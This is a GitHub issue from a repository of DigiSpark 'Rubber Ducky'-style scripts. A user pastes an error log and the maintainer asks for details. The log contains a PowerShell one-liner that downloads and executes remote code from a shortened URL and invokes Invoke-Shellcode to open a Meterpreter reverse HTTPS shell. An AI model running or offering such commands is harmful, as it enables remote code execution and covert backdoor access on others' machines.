CedArctic / DigiSpark-Scripts

USB Rubber Ducky type scripts written for the DigiSpark.
MIT License
1.92k stars 602 forks source link

RapidShell ParameterBindingException #18

Closed danielkp1234 closed 5 years ago

danielkp1234 commented 5 years ago

C:\Users\danil\AppData\Local\Temp>tmp.cmd

C:\Users\danil\AppData\Local\Temp>start C:/Windows/System32/Ribbons.scr /s

C:\Users\danil\AppData\Local\Temp>powershell "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.101 -Lport 444 -Force" Invoke-Shellcode : A parameter cannot be found that matches parameter name 'Payload'. At line:1 char:90

CedArctic commented 5 years ago

More information is needed on the issue. Feel free to post it and I will re-open it.